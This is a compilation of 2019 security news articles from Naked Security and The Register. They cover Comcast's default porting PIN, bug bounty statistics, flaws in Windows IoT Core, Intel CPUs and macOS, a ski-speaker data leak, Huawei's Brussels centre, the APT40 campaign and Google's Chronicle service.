STE WILLIAMS

Comcast security nightmare: default ‘0000’ PIN on everybody’s account

In 2017, Comcast launched Xfinity Mobile: a wireless service that runs on Verizon wireless and Comcast’s own Wi-Fi hotspots.

To make it easy for customers to port their existing phone numbers over from other carriers, the company used a shortcut: no PINs needed. Oh, except for one, default PIN of “0000,” that is, which made it super simple easy for crooks to hijack people’s phone numbers.

The glaring security gaffe came to light after multiple customers reported that their numbers had been ported without authorization, that the hijackers had switched the numbers to their own accounts, and that the crooks then carried out identity theft.

One of the ripped-off customers wrote to a Washington Post columnist who addresses readers’ tech problems. From the column, which appeared on Thursday:

‘This is a security hole large enough to drive a truck through,’ reader Larry Whitted in Lodi, Calif., wrote last week.

As a customer of Comcast’s Xfinity Mobile phone service, Whitted says someone was able to hijack his phone number, port it to a new account on another network and commit identity fraud. The fraudster loaded Samsung Pay onto the new phone with Whitted’s credit card – and went to the Apple Store in Atlanta and bought a computer, he said.

The core of the problem: Comcast doesn’t protect its mobile accounts with a unique PIN. (Comcast’s help site for switching carriers suggests this is to make things easier: ‘We don’t require you to create an account PIN, so you don’t need to provide that information to your new carrier.’) The default it uses instead is…. 0000.

To port your phone number, you need two things: your Comcast mobile account number, and a PIN that should, in theory, verify that it’s really you, the legitimate account holder, looking to port your own number. Comcast apparently sought to make it easier for customers by appearing to make the process PIN-less. But it didn’t make the PIN go away: reportedly, it just set a default PIN of 0000 for all customers … a PIN that customers couldn’t change.

All an attacker had to do was get hold of a victim’s account number, then plug in those 4 zeroes, and presto! Stolen account, ported to another carrier.

Last week, Comcast edited its help page to get rid of references to the account PIN.

What it says now:

When you contact your new carrier to transfer your number, they will want your current address and Xfinity Mobile account number

Password reuse again rears its ugly ugly head head

Comcast told Ars Technica that fewer than 30 customers were affected by the security snafu, which only affected customers who reused passwords across multiple sites.

From its statement:

We believe this has only affected customers whose passwords might have been included in previous, non-Comcast related breaches. We recommend that customers use unique, strong passwords. In addition, customers can further protect their Xfinity account by signing up for multi-factor authentication.

Comcast referred to the fraudulent porting of mobile numbers as being “a well-known industry issue and not unique to Xfinity Mobile.” At Naked Security, we’ve covered the issue of phone hijacking, but more along the lines of fraudulent SIM (subscriber identity module) swaps rather than default 0000 PINs. In SIM swaps, crooks talk a mobile phone shop into re-issuing someone else’s SIM, perhaps by using fake ID, by guessing at security questions, or by colluding with a corrupt employee.

In SIM swaps, the fraudsters drain victims’ bank accounts by taking over their mobile phones, then intercepting calls or text messages sent by their banks.

The end result is the same for the Comcast security snafu as it is for SIM swaps: crooks get new laptops or other loot, while victims are left in the lurch, trying to convince somebody that they’re the real account holder.

Comcast says it’s fixed the problem, though it didn’t give details about how, saying that such information could help attackers. The company said it also plans to offer a real PIN-based system, but it didn’t say when we’ll be seeing it.

More from Comcast’s statement:

We have also implemented a solution that provides additional safeguards around our porting process, and we’re working aggressively towards a PIN-based solution. We are reaching out to impacted customers to apologize and work with them to address the issue. We take this very seriously, and our fraud detection and prevention methods, policies and procedures are continually being reviewed, tested and refined.

We’re glad to hear that Comcast is going to require customers to choose a unique PIN when signing up for service. Of course, it could have/should have done that two years ago when it kicked off Xfinity Mobile… but then it wouldn’t have given news outlets another chance to make fun of Kanye West showing off his password of 000000 in the Oval Office.

How to stop the hijackers

Comcast told the Post that a fraudster still needs several pieces of customer information to port a number, including the obscure Xfinity Mobile account number. To get at that account number, users have to log into the Xfinity Mobile web portal, using their Comcast user password. The company doesn’t send out paper bills for Xfinity Mobile accounts, the company told Ars; nor does it include the account number in emails to customers.

Given that Comcast blamed password reuse for enabling these attacks, it makes sense to use a unique, strong password for your Comcast account, just as for any other account.

Password managers make creating, storing and using a slew of strong passwords much easier. True, there have been issues reported recently about password managers not scrubbing passwords from memory once they’re no longer being used, but we still believe that the advantages outweigh the issues, which will likely be tidied up through updates anyway.

Make sure you also use two-factor authentication (2FA) whenever it’s available. That way, even if someone has your password, they still can’t log in as you.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/1JlqJ46bIPE/

Companies are flying blind on cybersecurity

IT managers are flying blind in the battle to protect their companies from cyberattacks, according to a survey released today. The result is that getting pwned is now the rule, rather than the exception.

Sophos, which publishes this blog, worked with market research company Vanson Bourne to survey 3,100 IT managers across the globe. The survey covered companies in 12 countries, and quizzed organizations with as few as 100 users and as many as 5,000, finding that 68% of companies had been hit by a cyberattack in the last year.

The reason surfaced quickly enough; companies can’t see what’s happening on their endpoint devices. It leaves them struggling to prevent attacks or even to know how and when they happened.

Most threats (37%) are only discovered when they reach servers, and another 37% are detected on the network. Attacks typically start on endpoint devices, so if companies are only picking them up on the server, that means attackers have already been snooping around their infrastructure for some time. Unfortunately, 17% of IT managers didn’t know exactly how long. Those who did know said that attackers had been on their networks for 13 hours before being detected. That’s plenty of time to steal a juicy batch of data or to plant some nasty ransomware.

Not seeing the beginning of the attack chain also makes it difficult for IT managers to understand how the attack unfolded. One in five IT managers didn’t know how an attacker got in, even after discovering the threat.

This means many companies are making security decisions without having all of the facts, the report said. You can’t plug holes if you don’t know where they are.

This inability to shine a light on attackers leaves IT managers shooting in the dark. Organizations that investigate at least one potential security incident each month spend 48 days every year investigating them. Only 15% of these incidents turn out to be malware infections, meaning that IT employees are spending around 41 days each year investigating non-issues.

Why are people running around in headless chicken mode? One of the biggest challenges in prioritising cybersecurity incidents is a lack of security expertise: 80% of respondents admitted that they need a stronger team in place to detect, investigate, and respond to cybersecurity incidents.

Sophos concluded that securing the endpoint is a good place to start. Survey respondents seemed to agree with it. Endpoint Detection and Response (EDR) is a popular tool for those who realise that they are missing important cybersecurity events – 57% of IT managers are planning to use it, with 39% scheduling its introduction in the next six months.

Just installing the EDR software isn’t enough, though, the survey found, as 54% of respondents who had invested in this cybersecurity tool couldn’t get the full benefit from it. The report suggests that management and skills play a part here. Having managers who understand how to drive these tools is crucial.

However you choose to protect yourself, though, one important message comes through: cyberattacks, while not inevitable, are highly probable. And unless you’ve got a beady eye on your infrastructure, you might well only find out about a compromise when you see your internal emails showing up on Pastebin.

Read the report in full here

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/DHlwXqMr2Lo/

Apple gets bug for free, while HackerOne declares first $1m bug hunter

Get ready for bug bounty whiplash: on one end of the spectrum, we’ve got the world’s first $1 million bug bounty hunter, according to HackerOne and on the other we’ve got a German teenager who caved and gave Apple a bug for free after refusing to do so in protest of the company’s invite-only/iOS-only bounties.

As far as the rich kid story goes, HackerOne announced on Friday that 19-year-old Santiago Lopez, a self-taught hacker from Argentina, has made history as the first hacker to make $1 million from bug bounties.

That would be cumulative, mind you, not a one-time uber bug. Lopez has been at this a long time, and he’s racked up a long list of bug kills.

Lopez goes by the handle @try_to_hack on HackerOne, an online platform that companies use to receive and manage vulnerability reports. Lopez, who’s been hacking and scoring bug bounties since 2015, has reported over 1,670 valid unique vulnerabilities to companies such as Verizon Media Company, Twitter, WordPress, Automattic, and HackerOne, as well as to private programs.

$42 million paid out since HackerOne debuted

In its 2019 annual report, which it released on Friday, HackerOne said that it paid out $19 million in bounties in 2018: an amount that’s close to the total bounty payouts for all preceding years combined.

In total, by the end of 2018, hackers had earned more than $42 million for valid results over the six years since HackerOne launched, in 2012. Those payouts are coming from planet-wide hacking: While India and the US remain the top hacker locations, more than six African countries had first-time hacker participation in 2018.

They’re hacking their own educations

Lopez is typical of the majority on HackerOne in that he’s self-taught. HackerOne says that 81% of hackers on the platform get their training outside of the classroom, typically learning the craft through blogs and other self-directed educational materials such as Hacker101 – a free class for web security – and publicly disclosed reports.

Just 6% of hackers say that they’ve completed a formal class or certification on hacking.

The top five countries represented by hackers in HackerOne are India, the US, Russia, Pakistan, and the UK: those countries account for a bit more than 51% of all hackers in the HackerOne community.

North America’s deep pockets

As far as financial rewards go, the money mostly flows from North America: Of the $42+ million awarded to hackers through 2018 on HackerOne, organizations in just eight countries served as the primary source for more than half of the money, with the US and Canada based organizations comprising the lion’s share of bounties, followed by the UK, Germany, Russia, and Singapore.

That money’s flowing away from its past destinations

HackerOne says that hackers from India and the US pocketed 30% of the bug bounties last year. That’s a lot, but it’s on the decline as rewards flow to other countries: hackers from those two countries actually took home 43% of the bounties the year before.

Lopez, in Argentina, is actually typical of the burgeoning talent coming from outside the historically top regions, HackerOne said.

Out of all the world’s hackers, those from Argentina have got to have the strongest financial incentive: according to HackerOne’s 2019 report, bug bounties had the highest multiplier of median annual wage in Argentina than any other country. In the US, for example, bug bounties will get you around 6.4x the median annual wage of a software engineer. In Argentina, that multiplier jumps to an enormous 46.6x.

The young eat bugs for lunch

Young: that’s the profile of the average hacker in the HackerOne community. Nine out of 10 hackers on the platform are under 35. Maybe that’s why they can stay awake long enough to find all these vulnerabilities: HackerOne reports that hackers are spending more hours hacking. More than 40% of the platform’s hackers are spending 20-plus hours per week searching for vulnerabilities.

Hackers need love, too

Yes, money tops the list of answers to “Why do you hack?” But it’s tied, at 14.3%, with the thirst for knowledge, as in, to learn tips and techniques.

When choosing which company to hack, the minimum bounty amounts notably dropped from the top factor down to fourth place. What motivates hackers more is again that thirst for knowledge, with 59.5% saying that it was the challenge or opportunity to learn that motivated them to participate in a particular company’s bug bounty program.

That was followed by 40.4% who said they liked the company against which they pitted their wits.

After that comes responsiveness. That was cited by 36.4% of hackers as the reason why they hacked a company. Which underscores what we already know: that hackers want to be acknowledged, thanked, or even just simply to be listened to…

…which brings us to Linux Henze – he whom Apple didn’t reward when he found, and published, a proof of concept he called KeySteal: what he claimed is a zero-day bug that can be exploited by attackers using a malicious app to drain passwords out of Apple’s Keychain password manager.

“I won’t release this.” … Blame Apple.

Henze initially said that he wouldn’t share details with Apple – and yes, the company asked – in protest of the company’s invite-only/iOS-only bounties.

But as of Thursday, Henze had thrown in the towel and decided to help Apple, and most particularly Mac OS users, in spite of the company’s bug program policies:

It might have looked like he was doing it just for money, Henze said, but that’s not the case:

My motivation is to get Apple to create a bug bounty program. I think that this is the best for both Apple and Researchers.

Thanks for releasing the bug, Linux, in spite of the lack of bug bounty.

You’re right, it’s not just about money. It’s about recognition and responsiveness from the company in question. A bug bounty program is a good way to formalize that respect and responsiveness.

Why does Apple have an invitation-only bug bounty program for iOS, but not for Mac OS? It seems to be a baffling approach to bugs.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/zf7_V1aynyM/

Windows IoT Core exploitable via ethernet

Microsoft’s Internet of Things (IoT) version of Windows is vulnerable to an exploit that could give an attacker complete control of the system, according to a presentation given by a security company over the weekend.

At the WOPR Summit in New Jersey, SafeBreach security researcher Dor Azouri demonstrated an exploit that will allow a connected device to run system-level commands on IoT devices running Microsoft’s operating system.

Windows IoT is effectively the successor to Windows Embedded. The lightweight version of Windows 10 is designed with low-level access for developers in mind and also supports ARM CPUs, which are extensively used in IoT devices. According to the Eclipse Foundation’s 2018 IoT Developer Survey, the operating system accounts for 22.9% of IoT solutions development, featuring heavily in IoT gateways.

How it works

The attack comes with some caveats. According to the whitepaper published yesterday, it only works on stock downloadable versions of the Core edition of Windows IoT, rather than the custom versions that might be used in vendor products. An attacker can also only launch the exploit from a machine directly connected to the target device via an Ethernet cable.

The exploit targets the Hardware Library Kit (HLK), which is a certification tool used to process hardware tests and send back results. The proprietary protocol that HLK uses is called Sirep, and this is its weak spot. A Sirep test service regularly broadcasts the unique ID on the network to advertise the IoT device’s presence. Windows IoT Core also listens for incoming connections through three open ports on its firewall.

However, incoming connections to the Sirep test service are not authenticated, meaning that any device can communicate with it as long as it is connected via an ethernet cable rather than wirelessly. Azouri believes that this may be because the IoT testing service was ported from the old Windows Phone operating system, which relied on USB connections.

Unauthenticated devices can send a range of commands via the ports, enabling them to get system information from the device, retrieve files, upload files, and get file information.

Perhaps the most powerful, though, is the LaunchCommandWithOutput command. This retrieves the program path and command-line parameters needed to launch commands on the device. These operate with system-level privileges. The attacker can use this information to run processes on an IoT device from an unauthenticated computer.

The researchers created a Python tool called SirepRAT that allows attackers to exploit the flaw in Windows IoT. They even provided a template file used to pass payloads for different commands, along with examples.

Microsoft’s response

According to the researchers’ WOPR slides, Microsoft told them that it will not address the report because Sirep is an optional feature on Windows IoT Core, and its documentation calls the feature out as a test package, and that it reportedly plans to…

update the documentation to mention that images running the TestSirep package allow anyone with network access to the device to execute any command as SYSTEM without *any* authentication and that this is by design.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/AB_JOEhQXzQ/

SPOILER alert, literally: Intel CPUs afflicted with simple data-spewing spec-exec vulnerability

Further demonstrating the computational risks of looking into the future, boffins have found another way to abuse speculative execution in Intel CPUs to steal secrets and other data from running applications.

This security shortcoming can be potentially exploited by malicious JavaScript within a web browser tab, or malware running on a system, or rogue logged-in users, to extract passwords, keys, and other data from memory. An attacker therefore requires some kind of foothold in your machine in order to pull this off. The vulnerability, it appears, cannot be easily fixed or mitigated without significant redesign work at the silicon level.

Speculative execution, the practice of allowing processors to perform future work that may or may not be needed while they await the completion of other computations, is what enabled the Spectre vulnerabilities revealed early last year.

In a research paper distributed this month through pre-print service ArXiv, “SPOILER: Speculative Load Hazards Boost Rowhammer and Cache Attacks,” computer scientists at Worcester Polytechnic Institute in the US, and the University of Lübeck in Germany, describe a new way to abuse the performance boost.

The researchers – Saad Islam, Ahmad Moghimi, Ida Bruhns, Moritz Krebbel, Berk Gulmezoglu, Thomas Eisenbarth and Berk Sunar – have found that “a weakness in the address speculation of Intel’s proprietary implementation of the memory subsystem” reveals memory layout data, making other attacks like Rowhammer much easier to carry out.

The researchers also examined Arm and AMD processor cores, but found they did not exhibit similar behavior.

“We have discovered a novel microarchitectural leakage which reveals critical information about physical page mappings to user space processes,” the researchers explain.

“The leakage can be exploited by a limited set of instructions, which is visible in all Intel generations starting from the 1st generation of Intel Core processors, independent of the OS and also works from within virtual machines and sandboxed environments.”

A ghost

Data-spewing Spectre chip flaws can’t be killed by software alone, Google boffins conclude

READ MORE

The issue is separate from the Spectre vulnerabilities, and is not addressed by existing mitigations. It can be exploited from user space without elevated privileges.

SPOILER doesn’t stand for anything. In an email to The Register, Daniel (Ahmad) Moghimi explained: “We picked a named that starts with ‘Sp’, since it’s an issue due to speculative execution and it kinda spoils existing security assumptions on modern CPUs.”

SPOILER describes a technique for discerning the relationship between virtual and physical memory by measuring the timing of speculative load and store operations, and looking for discrepancies that reveal memory layout.

“The root cause of the issue is that the memory operations execute speculatively and the processor resolves the dependency when the full physical address bits are available,” said Moghimi. “Physical address bits are security sensitive information and if they are available to user space, it elevates the user to perform other micro architectural attacks.”

Memory madness

Modern processors manage reading and writing to RAM using a memory order buffer to keep track of operations. The buffer is used to perform store instructions – copying data from a CPU register to main memory – in the order they are laid out in executable code, and perform load operations – copying data from main memory to a register – out-of-order, speculatively. It allows the processor to run ahead and speculatively fetch information from RAM into the registers, provided there are no dependency problems, such as a load relying on an earlier store that hasn’t yet completed.

Speculating about a load operation may result in false dependencies if physical address information isn’t available. Intel’s chips perform memory disambiguation to prevent computation on invalid data, arising from incorrect speculation.

They just don’t do it all that well. “The root cause for SPOILER is a weakness in the address speculation of Intel’s proprietary implementation of the memory subsystem which directly leaks timing behavior due to physical address conflicts,” the paper explains.

“Our algorithm, fills up the store buffer within the processors with addresses that have the same offset but they are in different virtual pages,” said Moghimi. “Then, we issue a memory load that has the same offset similarly but from a different memory page and measure the time of the load. By iterating over a good number of virtual pages, the timing reveals information about the dependency resolution failures in multiple stages.”

spectre

Ready for another fright? Spectre flaws in today’s computer chips can be exploited to hide, run stealthy malware

READ MORE

SPOILER, the researchers say, will make existing Rowhammer and cache attacks easier, and make JavaScript-enabled attacks more feasible – instead of taking weeks, Rowhammer could take just seconds. Moghimi said the paper describes a JavaScript-based cache prime+probe technique that can be triggered with a click to leak private data and cryptographic keys not protected from cache timing attacks.

Mitigations may prove hard to come by. “There is no software mitigation that can completely erase this problem,” the researchers say. Chip architecture fixes may work, they add, but at the cost of performance.

Intel is said to have been informed of the findings on December 1, 2018. The chip maker did not immediately respond to a request for comment. The paper’s release comes after the 90 day grace period that’s common in the security community for responsible disclosure.

Moghimi doubts Intel has a viable response. “My personal opinion is that when it comes to the memory subsystem, it’s very hard to make any changes and it’s not something you can patch easily with a microcode without losing tremendous performance,” he said.

“So I don’t think we will see a patch for this type of attack in the next five years and that could be a reason why they haven’t issued a CVE.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/05/spoiler_intel_flaw/

Bad news: Google drops macOS zero-day after Apple misses bug deadline. Good news: It’s fiddly to exploit

Google has publicly disclosed a zero-day flaw in Apple’s macOS after the Cupertino mobe-maker failed to fix the security shortcoming within the ad giant’s 90-day deadline.

The vulnerability itself is relatively minor in terms of danger: it allows malware already running on your Mac, or a rogue logged-in user, to potentially escalate their privileges, and fully take over the computer, by secretly altering the contents of files on user-mounted disks without you noticing. Thus, to exploit the weakness, your computer already has to be compromised, which is pretty much game over for most folks.

However, this is Google dropping a proof-of-concept exploit on a tech rival, and it’s therefore caught everyone’s attention.

No warning

Two of the web goliath’s Project Zero researchers, Meltdown-finder Jann Horn and bug-hunter-extraordinaire Ian Beer, revealed late last week how macOS’s copy-on-write mechanism can be exploited by miscreants to modify files without triggering any sort of alert or warning from the operating system.

This mechanism can, it appears, be exploited as such: wait for a particular privileged process to open a file on a user-mounted disk by mapping the object to its virtual memory; then alter the underlying file system of the mounted disk to change the mapped file; and then force the memory pages holding the mapped file for the privileged process to be evicted by writing to a separate huge memory-mapped file.

When victim process reads from its mapped file again, it will pull in the altered data from the file system without any notification or warning the file underneath has changed. It thus may be possible to exploit this to crash the app, or confuse it to achieve privilege escalation.

It’s a long shot, though one that could be taken by a malicious application, code fetched from a dodgy NPM package or GitHub repo, and so on.

Under pressure

“After the destination process has started reading from the transferred memory area, memory pressure can cause the pages holding the transferred memory to be evicted from the page cache,” Horn explained.

“Later, when the evicted pages are needed again, they can be reloaded from the backing filesystem. This means that if an attacker can mutate an on-disk file without informing the virtual management subsystem, this is a security bug.

“MacOS permits normal users to mount filesystem images. When a mounted filesystem image is mutated directly (e.g. by calling pwrite() on the filesystem image), this information is not propagated into the mounted filesystem.”

More concerning than the vulnerability itself is Apple’s response. Horn reported the bug to Sir Jony’s shiny thing factory back in November 2018 with a standard 90-day window for patch.

Despite putting out multiple security updates for the macOS between then and now, the above vulnerability was not patched. While the Project Zero team says that Apple is aware of the issue and has been planning to patch it, the deadline has passed, meaning the bug and its proof-of-concept exploit are now publicly disclosed as a zero day. It’s not the first time Google has done this, though it’s usually Microsoft that misses the deadline.

On the other hand, the bug is so esoteric, it’s probably way down Apple’s to-do list.

Apple did not respond to a request for comment. Google did not respond, either. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/05/google_macos_zero_day/

That’s a nice ski speaker you’ve got there. Shame if it got pwned

A set of smart speakers intended for ski helmets are a terrible data-leaking pit of badness, according to a Pen Test Partners researcher who innocently bought himself one of the devices.

“I love snow sports, and I also like my tunes, so purchasing the Outdoor Tech CHIPS smart headphones was a no-brainer,” wrote PTP chap Alan Monie this week. “They fit into audio-equipped helmets and have huge 40mm drivers. Warm ears and good bass.”

The Bluetooth snow helmet speakers were, however, not a good choice for people who value their privacy and security.

“[Think back] to when you used to have to carry your MP3 + your ear buds + your smartphone + your walkie-talkie + heated mittens when you would go ride your local hill,” gushed manufacturer Outdoor Tech’s marketing blurb. The speakers themselves fit inside a ski helmet and also serve as a short-range walkie-talkie – something which Alan discovered was not the innocent feature that it seemed to be on the surface.

“I began setting up a group and noticed that I could see all users. I started searching for my own name and found that I could retrieve every user with the same name in their account,” he said.

Through using insecure direct object references, Alan was able to:

  • Pull all the users and their email addresses from the API
  • Retrieve their password hash, and password reset code in plain text
  • View their phone number
  • Extract users’ real-time GPS position
  • Listen to real-time walkie-talkie chats

Even worse, when Alan queried the API with the letter A, intending to find his own name and add it to a user group he wanted to set up, the API returned 19,000 results – every single registered user whose first name started with A. For good measure it also threw in their email addresses.

With some basic poking around in the API using nothing more than his own user-level credentials, Alan wrote that he was able to get hold of other users’ password hashes, their “password reset code and user’s phone number in plain text” as well as listing their real-time GPS locations. He was even able, he said, to get hold of the live stream for other users’ walkie-talkie chats.

When PTP contacted Outdoor Tech, the firm’s marketing manager replied once before replies dried up. After a three-week delay, PTP decided to go public with the vulns because it said “the vulnerability hadn’t been acknowledged and no remediation actions had been proposed”.

The cautionary tale sheds light on interesting and potentially useful smart gadgets. Far from being an Alibaba special, Outdoor Tech does not appear to be some kind of fly-by-night internet vendor mainly motivated to make a fast buck. Its products clearly have a loyal and engaged userbase, as shown by the ongoing development of the CHIPS speakers from their first iteration as a set of in-helmet speakers to today’s Bluetooth-enabled tech. Yet that popularity should also come with some corporate responsibility. Security through obscurity is no security at all – and with a live vuln still in the product, the onus is on Outdoor Tech to fix it and fast.

Outdoor Tech had not responded to The Register‘s emailed enquiries by the time of publication. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/05/outdoor_tech_chips_ski_helmet_speakers_vulnerability/

Huawei opens Brussels code-check office: Hey! EU’ve got our guide – love Huawei

Huawei stopped fighting metaphorical fires today to lift the curtain on its Brussels Cyber Security Transparency Centre in a move to position the Chinese company as a driving force for new global security standards.

“We need to work together on unified standards. Based on a common set of standards, technical verification and legal verification can lay the foundation for building trust,” said rotating chairman Ken Hu, giving the inauguration speech for the Huawei Cyber Security Transparency Centre (HCSTC) at Brussels’ Palais des Academies this morning.

Huawei said in a statement that its aim with the HCSTC in Brussels was “to offer government agencies, technical experts, industry associations, and standards organizations a platform, where they can communicate and collaborate to balance out security and development in the digital era”.

The centre will also act as a shop window for Huawei’s security products, focusing on 5G, IoT and cloud, and “independent testing organisations” as well as telcos and nation states, which are, the company said, most welcome to use its “dedicated testing environments”.

EU functionary Ulrik Trolle Smed, who works in the office of EU Security Commissioner Julian King, gave a speech at the event praising the opening of the centre. He said: “We are in favour of anything that leads to better cybersecurity because it’s a collective responsibility.”

Any chumminess displayed by EU institutions towards Huawei is likely to alarm the Anglosphere Five Eyes spying alliance. The Five Eyes countries – America, Australia, the UK, Canada and New Zealand – are almost all against allowing Huawei’s network equipment to be installed in their core networks. The UK, however, has not closed the door on Huawei’s involvement in next-generation mobile networks, despite its oversight panel delivering some muted criticism of its firmware security.

We believe that European regulators are on track to lead the international community in terms of cyber security standards and regulatory mechanisms. We commit to working more closely with all stakeholders in Europe, including regulators, carriers, and standards organizations, to build a system of trust based on facts and verification.

Ken Hu, Huawei rotating chairman

Hu called for a “collaborative effort” on cybersecurity from both governments and industry “because no single vendor, government, or telco operator can do it alone”, going on to praise the GSMA’s Network Equipment Security Assurance Scheme: “We believe that all stakeholders should get behind this framework. Ultimately, the standards we adopt must be verifiable for all technology providers and all carriers.”

The HCSTC currently employs “around eight to 10 people” according to a company spokesman who gave a brief tour of its offices, located in a nondescript block on Gruinard 9. The company is pitching the centre as a UK-style code review facility, open to telcos and states alike, and a platform for influencing the European Union’s renewed drive to improve cyber security standards.

“At Huawei, we have the ABC principle for security: “Assume nothing. Believe nobody. Check everything,” quipped Hu.

Even if some of the security world rejects the idea of Huawei doing the checking, it appears the Chinese company is deepening its ties with the European Union. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/05/huawei_brussels_code_inspection_facility/

Oh no Xi didn’t?! China’s hackers nick naval tech blueprints, diddle with foreign elections to boost trade – new claim

RSA Researchers claim to have uncovered a five-year Chinese hacking operation aimed at bolstering Beijing’s naval might and trade deals to the detriment of the world’s democracies and maritime hardware makers.

In a report issued conveniently just in time for the RSA Security Conference in San Francisco this week, IT threat watchdog FireEye claimed a group of state-backed hackers dubbed APT40 compromised manufacturers to siphon tech blueprints and intelligence that could be used to modernize China’s navy – and even sought to influence foreign elections.

FireEye’s Fred Plan, Nalani Fraser, Jacqueline O’Leary, Vincent Cannon, and Ben Read, explained on Monday how they once thought the cyber-intrusions were the work of two separate crews of miscreants, dubbed TEMP.Periscope and TEMP.Jumper. However, the two operations were in fact merged into one by the researchers, and attributed to a Beijing-sponsored hacking effort: APT40.

Here’s the caper: China hopes to improve its naval fleet with new boats featuring all the modern tech trappings, and so its government-controlled hackers were ordered to steal details of components from manufacturers around the globe. The spies also tried swinging elections in various nations in any way that favored the Middle Kingdom’s “One Belt, One Road” initiative – an effort to improve its international trade routes.

“The group has specifically targeted engineering, transportation, and the defense industry, especially where these sectors overlap with maritime technologies,” Team FireEye claimed. “More recently, we have also observed specific targeting of countries strategically important to the Belt and Road Initiative including Cambodia, Belgium, Germany, Hong Kong, Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States, and the United Kingdom.”

Show us some proof

In pointing the finger at China, FireEye identified the industries and location of the targets – which happened to be relevant to China’s naval interests – and the particular time frame of the hacking: most operations took place during China business hours. The hackers also used servers located in China, and the command and control PCs probed by the researchers all ran Chinese language settings.

Attribution, of course, is hard, and yes, the cynical among us will say this is all planted information to pin the blame on China. On the other hand, this is the conclusion FireEye has come to: it woz Beijing.

In addition to the tried-and-true methods of spear-phishing victims with poisoned attachments to open, the APT40 group also seeded specific webpages with exploit code that tried to install backdoor malware on systems when visited by targets. If infected, the computers could be remotely controlled and spied upon.

hacking

You think election meddling is bad now? Buckle up for 2020, US intel chief tells Congress

READ MORE

From there, it is said the Chinese attackers harvested the infected machine’s account credentials and used those to access other areas of the targeted company’s network and perform reconnaissance. Finally, the hackers archived and exfiltrated any blueprints and intelligence they found, and bounced the lot through multiple machines before finally downloading it to a friendly server.

Interestingly, the focus on maritime technology did not last long. FireEye noted that over the past two years, the group has shifted its attention towards election meddling in countries where China has a trade interest.

“Based on APT40’s broadening into election-related targets in 2017, we assess with moderate confidence that the group’s future targeting will affect additional sectors beyond maritime, driven by events such as China’s Belt and Road Initiative,” FireEye concluded.

“In particular, as individual Belt and Road projects unfold, we are likely to see continued activity by APT40 which extends against the project’s regional opponents.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/05/chinas_navy_hacking/

Alphabet snoop: If you’re OK with Google-spawned Chronicle, hold on, hold on, dipping into your intranet traffic, wait, wait

RSA Google-spawned security outfit Chronicle this week unveiled a service that analyzes telemetry data from customers’ networks to detect cyber-attacks lurking among the rivers of packets.

Dubbed Backstory, the tool will allow IT admins to sift through things like DNS usage, endpoint activity logs, and Cisco NetFlow data to see who was doing what and when on corporate network. Additionally, Chronicle said it will allow customers to compare their logs and telemetry information against information gathered by Google and a number of “other sources,” to verify whether activities on their systems are legit or malicious, though the Alphabet-backed company says it does not sell nor share any user data.

“Backstory compares your network activity against a continuous stream of threat intelligence signals, curated from a variety of sources, to detect potential threats instantly,” Alphabet-owned Chronicle said in introducing the new service.

“It also continuously compares any new piece of information against your company’s historical activity, to notify you of any historical access to known-bad web domains, malware-infected files, and other threats.”

Chronicle - Alphabet's new security company

S for Security is Google owner Alphabet’s new favorite letter

READ MORE

The aim of all this, says Chronicle, is to make it easier for companies to track down where attacks are coming from and potentially spot ongoing attacks when they notice that their activity logs match up with the addresses and traffic patterns used by other known hacking operations. We can only hope it’s more user-friendly and less clunky than real-time web-log-parsing tool Google Analytics.

Because Chronicle wants customers to collect and upload as much data as possible – since this is when the service is most effective – the Backstory service will not be charging based on traffic or data loads, but rather licensing costs will be calculated based on the size of the customer account.

“Building a system that can analyze large amounts of telemetry for you won’t be useful if you are penalized for actually loading all of that information. Too often, vendors charge customers based on the amount of information they process,” Chronicle explained.

“Since most organizations generate more data every year, their security bills keep rising, but they aren’t more secure.”

The service is set to go live later this week with a launch set to take place during the RSA Conference in San Francisco. ®

PS: Speaking of Google, apparently its engineers have been prodding around internally, and allegedly found work still ongoing on Dragonfly, its controversial censored search engine for China.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/05/alphabet_chronicle_backstory/